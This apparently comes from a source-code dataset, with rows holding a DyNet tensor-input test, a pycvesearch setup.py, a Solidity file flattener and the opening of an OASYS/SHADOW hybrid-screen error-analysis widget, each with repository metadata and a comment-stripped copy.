    assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]) , "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
    assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
    assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
# Passing a non-array must raise TypeError rather than silently succeed.
caught = False
try:
    dy.renew_cg()
    x = dy.inputTensor("This is not a tensor", batched=True)
except TypeError:
    caught = True
assert caught, "Exception wasn't caught"
| 49.972973 | 212 | 0.646836 | from __future__ import print_function
import dynet as dy
import numpy as np
input_vals = np.arange(81)
squared_norm = (input_vals**2).sum()
shapes = [(81,), (3, 27), (3, 3, 9), (3, 3, 3, 3)]
for i in range(4):
dy.renew_cg()
input_tensor = input_vals.reshape(shapes[i])
x = dy.inputTensor(input_tensor)
assert (x.dim()[0] == shapes[i] and x.dim()[1] == 1),"Dimension mismatch : {} : ({}, {})".format(x.dim(), shapes[i],1)
assert (x.npvalue() == input_tensor).all(), "Expression value different from initial value"
assert dy.squared_norm(x).scalar_value() == squared_norm, "Value mismatch"
dy.renew_cg()
xb = dy.inputTensor(input_tensor, batched=True)
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]), "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
dy.renew_cg()
xb = dy.inputTensor([np.asarray(x).transpose() for x in input_tensor.transpose()])
assert (xb.dim()[0] == (shapes[i][:-1] if i>0 else (1,)) and xb.dim()[1] == shapes[i][-1]) , "Dimension mismatch with batch size : {} : ({}, {})".format(xb.dim(), (shapes[i][:-1] if i>0 else 1),shapes[i][-1])
assert (xb.npvalue() == input_tensor).all(), "Batched expression value different from initial value"
assert dy.sum_batches(dy.squared_norm(xb)).scalar_value() == squared_norm, "Value mismatch"
caught = False
try:
dy.renew_cg()
x = dy.inputTensor("This is not a tensor", batched=True)
except TypeError:
caught = True
assert caught, "Exception wasn't caught"
| true | true |
1c3c86d0383a877e5a99c2cda9404c7dd72f8140 | 936 | py | Python | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | setup.py | penafieljlm/PyCVESearch2.7 | 75a9f3f64bd497538363b0079ca8b88d4971bc92 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
# Read the long description up front: the previous inline open() call leaked
# its file handle (never closed); a with-block closes it deterministically.
with open('README.md', 'r') as readme:
    long_description = readme.read()

setup(
    name='pycvesearch',
    version='0.5',
    url='https://github.com/cve-search/PyCVESearch',
    author='Raphaël Vinot',
    author_email='raphael.vinot@circl.lu',
    license='Apache v2.0 License',
    packages=['pycvesearch'],
    description='A python wrapper around cve.circl.lu',
    long_description=long_description,
    keywords=['CVE', 'API', 'wrapper'],
    classifiers=[
        'License :: OSI Approved :: BSD License',
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        'Intended Audience :: Science/Research',
        'Intended Audience :: Telecommunications Industry',
        'Programming Language :: Python',
        'Topic :: Security',
        'Topic :: Internet',
    ],
    # BUGFIX: the setuptools keyword is `tests_require`; the previous
    # `tests_requires` was an unknown keyword and was silently ignored.
    tests_require=['nose'],
    test_suite='nose.collector',
    install_requires=['requests'],
)
from setuptools import setup
setup(
name='pycvesearch',
version='0.5',
url='https://github.com/cve-search/PyCVESearch',
author='Raphaël Vinot',
author_email='raphael.vinot@circl.lu',
license='Apache v2.0 License',
packages=['pycvesearch'],
description='A python wrapper around cve.circl.lu',
long_description=open('README.md', 'r').read(),
keywords=['CVE', 'API', 'wrapper'],
classifiers=[
'License :: OSI Approved :: BSD License',
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Telecommunications Industry',
'Programming Language :: Python',
'Topic :: Security',
'Topic :: Internet',
],
tests_requires=['nose'],
test_suite='nose.collector',
install_requires=['requests'],
)
| true | true |
1c3c86f7601284851cba9d90b8b26aebf236f7f5 | 4,036 | py | Python | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 15 | 2019-02-11T20:13:49.000Z | 2022-01-10T08:01:53.000Z | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 2 | 2019-04-08T13:43:53.000Z | 2020-11-11T14:14:48.000Z | flaterra/__init__.py | cleanunicorn/flaterra | 757fdf072cb80dde945eda19b789009b6fedf6e7 | [
"MIT"
] | 2 | 2019-04-08T13:20:05.000Z | 2020-07-22T16:55:54.000Z | import re
import argparse
import logging
import sys
import os
# Absolute paths of files already inlined, shared across recursive calls so
# each file is emitted at most once.
imported_files = {}
# Experimental-pragma statements already emitted, to avoid duplicates.
pragma_dict = {}

# Matches "pragma solidity ..." lines so duplicates coming from imported
# files can be dropped from the flattened output.
_PRAGMA_SOLIDITY_RE = re.compile(r"^\s*pragma\s+solidity\b")


def flat_file(path, file, level=0):
    """Recursively flatten a Solidity source file.

    Resolves `file` relative to `path`, inlines every `import "...";` it finds
    (each imported file only once, tracked in the module-level `imported_files`),
    deduplicates `pragma experimental` lines, and drops `pragma solidity` lines
    from imported files (level > 0).  Returns the flattened source as a string.
    """
    # Normalize to an absolute path; further imports resolve relative to it.
    file = os.path.realpath("{path}/{file}".format(path=path, file=file))
    path = os.path.dirname(file)

    flat_source = ""

    # Skip files that were already inlined to avoid duplicate definitions.
    global imported_files
    if (file is not None) and (imported_files.get(file) is None):
        imported_files[file] = True
        logging.debug("Importing file {file}".format(file=file))
    else:
        logging.debug("Skipping file {file}".format(file=file))
        return flat_source

    logging.info(("+" * level) + " {file}".format(file=file))
    logging.debug("Reading file {file}".format(file=file))
    with open(file) as f:
        read_data = f.readlines()

    global pragma_dict
    for l in read_data:
        # Deduplicate "pragma experimental ...;" lines across all files:
        # the first occurrence is kept, later identical ones are skipped.
        pragma_experimental = re.findall(
            r"(\/\/)|\s*(pragma?)\s*(experimental?)\s*(.*?)\s*;", l
        )
        if (
            len(pragma_experimental) == 1
            and (pragma_experimental[0][1] == "pragma")
            and (pragma_experimental[0][2] == "experimental")
        ):
            pragma_key = "|".join(pragma_experimental[0])
            if pragma_dict.get(pragma_key) is None:
                pragma_dict[pragma_key] = True
                logging.info("Adding pragma: {pragma}".format(pragma=l))
            else:
                # This pragma was already added
                continue

        # BUGFIX: this was `if main is False:` — always false because `main`
        # is the CLI function object — and it referenced the undefined name
        # `pragma_regex`, so duplicate "pragma solidity" lines from imported
        # files leaked into the flattened output.  Skip them for level > 0.
        if level > 0 and _PRAGMA_SOLIDITY_RE.search(l) is not None:
            continue

        # Inline referenced files, e.g.: import "./contract.sol";
        import_match = re.findall(
            r"^\s*import\s+|(?!{.*}\s*from\s*)[\"|\'](.*)[\"|\']\s*;\s*$", l
        )
        if len(import_match) == 2:
            imported_file = import_match[1]
            flat_source += flat_file(path=path, file=imported_file, level=level + 1)
            flat_source += "\n"
            # Skip the import clause itself
            continue

        flat_source += l
    return flat_source
def main():
    """Command-line entry point: flatten a Solidity contract and write the result.

    Reads --folder/--contract, flattens via flat_file(), and writes to --output
    (defaulting to "<contract-basename>_flat.sol").
    """
    class CliParser(argparse.ArgumentParser):
        # On bad arguments, print the full help text instead of argparse's
        # terse two-line error, then exit with status 2.
        def error(self, message):
            sys.stderr.write("Error: {}\n".format(message))
            self.print_help()
            sys.exit(2)

    parser = CliParser()
    parser.add_argument("--folder", help="Folder with contracts", default="./")
    parser.add_argument("--contract", help="Main source Solidity file")
    parser.add_argument(
        "--output",
        help="Output flattened Solidity file. Otherwise it appends `_flat.sol` to the contract filename.",
    )
    parser.add_argument(
        "--verbose", "-v", action="count", default=0, help="Show details"
    )
    args = parser.parse_args()

    contracts_dir = args.folder
    main_sol = args.contract
    output_sol = args.output
    verbose = args.verbose

    # Set verbosity (INFO by default, DEBUG with -v)
    logging.getLogger().setLevel(logging.INFO)
    if verbose >= 1:
        logging.getLogger().setLevel(logging.DEBUG)

    source = flat_file(path=contracts_dir, file=main_sol, level=0)

    if not output_sol:
        # BUGFIX: the previous split(".")/pop()/append() sequence raised
        # IndexError for filenames without an extension (and mangled paths
        # whose directory contained a dot); os.path.splitext produces the
        # same "name_flat.sol" for normal inputs and is robust otherwise.
        base, _ = os.path.splitext(main_sol)
        output_sol = base + "_flat.sol"

    logging.info("Writing flattened file {file}".format(file=output_sol))
    with open(output_sol, "w") as f:
        f.write(source)


if __name__ == "__main__":
    main()
import argparse
import logging
import sys
import os
imported_files = {}
pragma_dict = {}
def flat_file(path, file, level=0):
file = os.path.realpath("{path}/{file}".format(path=path, file=file))
path = os.path.dirname(file)
flat_source = ""
global imported_files
if (file is not None) and (imported_files.get(file) is None):
imported_files[file] = True
logging.debug("Importing file {file}".format(file=file))
else:
logging.debug("Skipping file {file}".format(file=file))
return flat_source
logging.info(("+" * level) + " {file}".format(file=file))
logging.debug("Reading file {file}".format(file=file))
with open(file) as f:
read_data = f.readlines()
global pragma_dict
for l in read_data:
pragma_experimental = re.findall(
r"(\/\/)|\s*(pragma?)\s*(experimental?)\s*(.*?)\s*;", l
)
if (
len(pragma_experimental) == 1
and (pragma_experimental[0][1] == "pragma")
and (pragma_experimental[0][2] == "experimental")
):
pragma_experimental = pragma_experimental[0]
pragma_experimental = "|".join(pragma_experimental)
if (pragma_experimental is not None) and (
pragma_dict.get(pragma_experimental) is None
):
pragma_dict[pragma_experimental] = True
logging.info("Adding pragma: {pragma}".format(pragma=l))
else:
continue
if main is False:
pragma_match = re.search(pragma_regex, l)
if pragma_match is not None:
continue
import_match = re.findall(
r"^\s*import\s+|(?!{.*}\s*from\s*)[\"|\'](.*)[\"|\']\s*;\s*$", l
)
if len(import_match) == 2:
imported_file = import_match[1]
flat_source += flat_file(path=path, file=imported_file, level=level + 1)
flat_source += "\n"
continue
flat_source += l
return flat_source
def main():
class CliParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write("Error: {}\n".format(message))
self.print_help()
sys.exit(2)
parser = CliParser()
parser.add_argument("--folder", help="Folder with contracts", default="./")
parser.add_argument("--contract", help="Main source Solidity file")
parser.add_argument(
"--output",
help="Output flattened Solidity file. Otherwise it appends `_flat.sol` to the contract filename.",
)
parser.add_argument(
"--verbose", "-v", action="count", default=0, help="Show details"
)
args = parser.parse_args()
contracts_dir = args.folder
main_sol = args.contract
output_sol = args.output
verbose = args.verbose
logging.getLogger().setLevel(logging.INFO)
if verbose >= 1:
logging.getLogger().setLevel(logging.DEBUG)
source = flat_file(path=contracts_dir, file=main_sol, level=0)
if not output_sol:
output_sol = main_sol.split(".")
output_sol.pop()
output_sol[-1] += "_flat"
output_sol.append("sol")
output_sol = ".".join(output_sol)
logging.info("Writing flattened file {file}".format(file=output_sol))
with open(output_sol, "w") as f:
f.write(source)
if __name__ == "__main__":
main()
| true | true |
1c3c88770fdcab653e777c79aeedf0ce84d5c4a1 | 43,226 | py | Python | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-ShadowOui | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | 1 | 2019-08-22T01:04:39.000Z | 2019-08-22T01:04:39.000Z | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-Extensions | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | null | null | null | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-Extensions | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2018. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
__author__ = 'labx'
import os, sys
import orangecanvas.resources as resources
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from orangewidget import gui, widget
from orangewidget.settings import Setting
from oasys.util.oasys_util import EmittingStream
from orangecontrib.shadow.util.shadow_util import ShadowCongruence
from orangecontrib.shadow.util.shadow_objects import ShadowBeam
from PyQt5.QtGui import QImage, QPixmap, QPalette, QFont, QColor, QTextCursor
from PyQt5.QtWidgets import QLabel, QWidget, QHBoxLayout, QMessageBox, QFileDialog
from orangecontrib.shadow.widgets.gui.ow_automatic_element import AutomaticElement
from orangecontrib.shadow.widgets.special_elements import hybrid_control
from orangecontrib.shadow.util.shadow_objects import ShadowPreProcessorData
from orangecontrib.aps.util.gui import HistogramData, StatisticalDataCollection, HistogramDataCollection, \
DoublePlotWidget, write_histo_and_stats_file
from orangecontrib.aps.shadow.util.gui import Scan3DHistoWidget, ScanHistoWidget
class HybridScreenErrorAnalysis(AutomaticElement):
    """OASYS widget running SHADOW HYBRID diffraction calculations for a set of
    height-error profile files, collecting position histograms and statistics."""

    # Widget input channels: the ray-traced beam and optional preprocessor data.
    inputs = [("Input Beam", ShadowBeam, "setBeam"),
              ("PreProcessor Data", ShadowPreProcessorData, "setPreProcessorData")]

    name = "Hybrid Screen - Error Analysis"
    description = "Shadow HYBRID: Hybrid Screen - Error Analysis"
    icon = "icons/hybrid_screen.png"
    maintainer = "Luca Rebuffi and Xianbo Shi"
    maintainer_email = "lrebuffi(@at@)anl.gov, xshi(@at@)aps.anl.gov"
    priority = 2
    category = "HYBRID"
    keywords = ["data", "file", "load", "read"]

    want_control_area = 1
    want_main_area = 1

    # Persisted user settings (Setting = saved with the workflow).
    # Diffraction plane: 0=Sagittal, 1=Tangential, 2=Both(2D), 3=Both(1D+1D).
    ghy_diff_plane = Setting(1)
    # Calculation: 0=mirror size + figure errors, 1=grating size + figure errors.
    ghy_calcType = Setting(0)

    # 0 = take the value from the O.E., 1 = use the value entered below.
    focal_length_calc = Setting(0)
    ghy_focallength = Setting(0.0)
    distance_to_image_calc = Setting(0)
    ghy_distance = Setting(0.0)

    # Near-field calculation flag: 0=No, 1=Yes.
    ghy_nf = Setting(0)

    # Numerical-control parameters for the HYBRID computation.
    ghy_nbins_x = Setting(100)
    ghy_nbins_z = Setting(100)
    ghy_npeak = Setting(10)
    ghy_fftnpts = Setting(1e6)

    file_to_write_out = 0

    # 1 = analyze geometry to skip unnecessary calculations.
    ghy_automatic = Setting(1)

    # Text area listing the selected profile files (built in __init__).
    files_area = None
    # Height-error profile data files to cycle over.
    ghy_files = Setting([""])

    input_beam = None

    # Fixed GUI geometry (pixels).
    TABS_AREA_HEIGHT = 560
    CONTROL_AREA_WIDTH = 405
    IMAGE_WIDTH = 865
    IMAGE_HEIGHT = 605

    # Accumulated results per plane (x/z) and field (ff=far, nf=near).
    current_histo_data_x_ff = None
    current_histo_data_x_nf = None
    current_histo_data_z_ff = None
    current_histo_data_z_nf = None
    current_stats_x_ff = None
    current_stats_x_nf = None
    current_stats_z_ff = None
    current_stats_z_nf = None

    # Plot options: plot_type 0=2D/1=3D; plot_type_3D 0=Lines/1=Surface.
    plot_type = Setting(1)
    plot_type_3D = Setting(0)
    colormap = Setting(0)
    def __init__(self):
        """Build the widget GUI: run button, settings tabs, plot area, output log."""
        super().__init__()

        # "Run Hybrid" menu/toolbar action.
        self.runaction = widget.OWAction("Run Hybrid", self)
        self.runaction.triggered.connect(self.run_hybrid)
        self.addAction(self.runaction)

        self.controlArea.setFixedWidth(self.CONTROL_AREA_WIDTH)

        # Prominent run button at the top of the control area.
        button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")
        button = gui.button(button_box, self, "Run HYBRID", callback=self.run_hybrid)
        font = QFont(button.font())
        font.setBold(True)
        button.setFont(font)
        palette = QPalette(button.palette()) # make a copy of the palette
        palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
        button.setPalette(palette) # assign new palette
        button.setFixedHeight(45)

        # Main area: "Plots" tab (filled by initializeTabs) and "Output" log tab.
        main_tabs = oasysgui.tabWidget(self.mainArea)
        plot_tab = oasysgui.createTabPage(main_tabs, "Plots")
        out_tab = oasysgui.createTabPage(main_tabs, "Output")
        self.tabs = oasysgui.tabWidget(plot_tab)

        # Control area: basic vs advanced settings.
        tabs_setting = oasysgui.tabWidget(self.controlArea)
        tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
        tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)
        tab_bas = oasysgui.createTabPage(tabs_setting, "Basic Setting")
        tab_adv = oasysgui.createTabPage(tabs_setting, "Advanced Setting")

        # --- Basic: calculation parameters ---
        box_1 = oasysgui.widgetBox(tab_bas, "Calculation Parameters", addSpace=True, orientation="vertical", height=100)
        gui.comboBox(box_1, self, "ghy_diff_plane", label="Diffraction Plane", labelWidth=310,
                     items=["Sagittal", "Tangential", "Both (2D)", "Both (1D+1D)"],
                     callback=self.set_DiffPlane,
                     sendSelectedValue=False, orientation="horizontal")
        gui.comboBox(box_1, self, "ghy_calcType", label="Calculation", labelWidth=70,
                     items=["Diffraction by Mirror Size + Figure Errors",
                            "Diffraction by Grating Size + Figure Errors",],
                     callback=self.set_CalculationType,
                     sendSelectedValue=False, orientation="horizontal")
        gui.separator(box_1, 10)

        # --- Basic: height-error profile file selection ---
        box_files = oasysgui.widgetBox(tab_bas, "Height Error Profiles", addSpace=True, orientation="vertical", height=180)
        gui.button(box_files, self, "Select Height Error Profile Data Files", callback=self.select_files)
        self.files_area = oasysgui.textArea(height=120, width=360)
        self.refresh_files_text_area()
        box_files.layout().addWidget(self.files_area)

        # --- Basic: numerical control parameters ---
        box_2 = oasysgui.widgetBox(tab_bas, "Numerical Control Parameters", addSpace=True, orientation="vertical", height=140)
        self.le_nbins_x = oasysgui.lineEdit(box_2, self, "ghy_nbins_x", "Number of bins for I(Sagittal) histogram", labelWidth=260, valueType=int, orientation="horizontal")
        self.le_nbins_z = oasysgui.lineEdit(box_2, self, "ghy_nbins_z", "Number of bins for I(Tangential) histogram", labelWidth=260, valueType=int, orientation="horizontal")
        self.le_npeak = oasysgui.lineEdit(box_2, self, "ghy_npeak", "Number of diffraction peaks", labelWidth=260, valueType=int, orientation="horizontal")
        self.le_fftnpts = oasysgui.lineEdit(box_2, self, "ghy_fftnpts", "Number of points for FFT", labelWidth=260, valueType=int, orientation="horizontal")

        # --- Advanced: propagation parameters (focal length / image distance / NF) ---
        box_3 = oasysgui.widgetBox(tab_adv, "Propagation Parameters", addSpace=True, orientation="vertical", height=200)
        self.cb_focal_length_calc = gui.comboBox(box_3, self, "focal_length_calc", label="Focal Length", labelWidth=180,
                                                 items=["Use O.E. Focal Distance", "Specify Value"],
                                                 callback=self.set_FocalLengthCalc,
                                                 sendSelectedValue=False, orientation="horizontal")
        self.le_focal_length = oasysgui.lineEdit(box_3, self, "ghy_focallength", "Focal Length value", labelWidth=260, valueType=float, orientation="horizontal")
        gui.separator(box_3)
        self.cb_distance_to_image_calc = gui.comboBox(box_3, self, "distance_to_image_calc", label="Distance to image", labelWidth=150,
                                                      items=["Use O.E. Image Plane Distance", "Specify Value"],
                                                      callback=self.set_DistanceToImageCalc,
                                                      sendSelectedValue=False, orientation="horizontal")
        self.le_distance_to_image = oasysgui.lineEdit(box_3, self, "ghy_distance", "Distance to Image value", labelWidth=260, valueType=float, orientation="horizontal")
        gui.separator(box_3)
        self.cb_nf = gui.comboBox(box_3, self, "ghy_nf", label="Near Field Calculation", labelWidth=310,
                                  items=["No", "Yes"],
                                  sendSelectedValue=False, orientation="horizontal", callback=self.set_NF)

        # --- Advanced: geometry analysis option ---
        box_4 = oasysgui.widgetBox(tab_adv, "Geometrical Parameters", addSpace=True, orientation="vertical", height=70)
        gui.comboBox(box_4, self, "ghy_automatic", label="Analize geometry to avoid unuseful calculations", labelWidth=310,
                     items=["No", "Yes"],
                     sendSelectedValue=False, orientation="horizontal")

        # --- Advanced: plot settings (2D vs 3D, 3D aspect) ---
        box_5 = oasysgui.widgetBox(tab_adv, "Plot Setting", addSpace=True, orientation="vertical", height=150)
        gui.comboBox(box_5, self, "plot_type", label="Plot Type", labelWidth=310,
                     items=["2D", "3D"],
                     sendSelectedValue=False, orientation="horizontal", callback=self.set_PlotType)
        self.box_pt_1 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
        self.box_pt_2 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
        gui.comboBox(self.box_pt_2, self, "plot_type_3D", label="3D Plot Aspect", labelWidth=310,
                     items=["Lines", "Surface"],
                     sendSelectedValue=False, orientation="horizontal")

        # Apply initial enable/visibility state derived from the stored settings.
        self.set_DiffPlane()
        self.set_DistanceToImageCalc()
        self.set_CalculationType()
        self.set_NF()
        self.set_PlotType()

        self.initializeTabs()

        # Export button and system-output log area.
        adv_other_box = oasysgui.widgetBox(tab_bas, "Export Data", addSpace=False, orientation="vertical")
        gui.button(adv_other_box, self, "Export Error Analysis", callback=self.export_error_analysis)
        self.shadow_output = oasysgui.textArea(height=580, width=800)
        out_box = gui.widgetBox(out_tab, "System Output", addSpace=True, orientation="horizontal")
        out_box.layout().addWidget(self.shadow_output)
def after_change_workspace_units(self):
label = self.le_focal_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.le_distance_to_image.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def select_files(self):
files, _ = QFileDialog.getOpenFileNames(self,
"Select Height Error Profiles", "","Data Files (*.dat);;Sha Files (*.sha)",
options=QFileDialog.Options())
if files:
self.ghy_files = files
self.refresh_files_text_area()
    def initializeTabs(self):
        """Rebuild the plot tab layout to match the current diffraction-plane
        and near-field settings; resets the cached plot canvases.

        Each result slot gets a tab widget with a "Position" and a "Stats" page;
        self.tab[i] holds that [position_page, stats_page] pair for slot i.
        """
        self.tabs.clear()
        tabs = []

        if self.ghy_diff_plane < 2:
            # Single plane: one far-field slot, plus a near-field slot if enabled.
            tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane")))
            self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")]]
            if self.ghy_nf == 1:
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field")))
                self.tab.append([gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")])
        elif self.ghy_diff_plane >= 2:
            # Both planes: (S)agittal and (T)angential slots, optionally with
            # interleaved near-field slots (order: S-ff, S-nf, T-ff, T-nf).
            if self.ghy_nf == 1:
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (S)")))
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (T)")))
                self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
                            [gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")],
                            [gui.createTabPage(tabs[2], "Position"), gui.createTabPage(tabs[2], "Stats")],
                            [gui.createTabPage(tabs[3], "Position"), gui.createTabPage(tabs[3], "Stats")]
                            ]
            else:
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
                tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
                self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
                            [gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")]
                            ]

        for tab in tabs:
            tab.setFixedHeight(self.IMAGE_HEIGHT)
            tab.setFixedWidth(self.IMAGE_WIDTH)

        # Lazily-created plot widgets, one per slot (see plot_emtpy et al.).
        self.plot_canvas = [None, None, None, None]
        self.plot_canvas_stats = [None, None, None, None]
    def plot_emtpy(self, progressBarValue, plot_canvas_index):
        """Show a "no result" placeholder image in the given plot slot and
        advance the progress bar.

        NOTE(review): the method name carries the historical "emtpy" typo;
        renaming would break external callers, so it is kept as-is.
        """
        # Create the placeholder widget only once per slot.
        if self.plot_canvas[plot_canvas_index] is None:
            widget = QWidget()
            widget.setLayout(QHBoxLayout())
            label = QLabel(widget)
            label.setPixmap(QPixmap(QImage(os.path.join(resources.package_dirname("orangecontrib.shadow.widgets.extension"), "icons", "no_result.png"))))
            widget.layout().addWidget(label)
            self.plot_canvas[plot_canvas_index] = widget
            self.tab[plot_canvas_index].layout().addWidget(self.plot_canvas[plot_canvas_index])
        self.progressBarSet(progressBarValue)
def setBeam(self, beam):
if ShadowCongruence.checkEmptyBeam(beam):
if ShadowCongruence.checkGoodBeam(beam):
self.input_beam = beam
if self.is_automatic_run:
self.run_hybrid()
def set_PlotType(self):
self.plot_canvas = [None, None, None, None]
self.box_pt_1.setVisible(self.plot_type==0)
self.box_pt_2.setVisible(self.plot_type==1)
def set_DiffPlane(self):
self.le_nbins_x.setEnabled(self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2)
self.le_nbins_z.setEnabled(self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2)
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_CalculationType(self):
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_NF(self):
if self.ghy_nf == 0:
self.focal_length_calc = 0
self.distance_to_image_calc = 0
self.cb_focal_length_calc.setEnabled(False)
self.le_focal_length.setEnabled(False)
else:
self.cb_focal_length_calc.setEnabled(True)
self.le_focal_length.setEnabled(True)
self.set_FocalLengthCalc()
    def set_FocalLengthCalc(self):
        # Manual focal-length entry only when "Specify Value" (1) is selected.
        self.le_focal_length.setEnabled(self.focal_length_calc == 1)
    def set_DistanceToImageCalc(self):
        # Manual distance entry only when "Specify Value" (1) is selected.
        self.le_distance_to_image.setEnabled(self.distance_to_image_calc == 1)
    def run_hybrid(self):
        """Run the hybrid (ray-tracing + wave-optics) calculation over all error profiles.

        A first pass runs with no height-error profile applied (the reference),
        then one pass per file in ``self.ghy_files``; histograms and statistics
        are accumulated across passes and plotted. Any failure is reported in a
        message box (and re-raised in develop mode).
        """
        try:
            self.setStatusMessage("")
            self.progressBarInit()
            self.initializeTabs()
            if ShadowCongruence.checkEmptyBeam(self.input_beam):
                if ShadowCongruence.checkGoodBeam(self.input_beam):
                    # Mirror calculation stdout into the "System Output" text area.
                    sys.stdout = EmittingStream(textWritten=self.write_stdout)
                    self.check_fields()
                    input_parameters = hybrid_control.HybridInputParameters()
                    input_parameters.ghy_lengthunit = self.workspace_units
                    input_parameters.widget = self
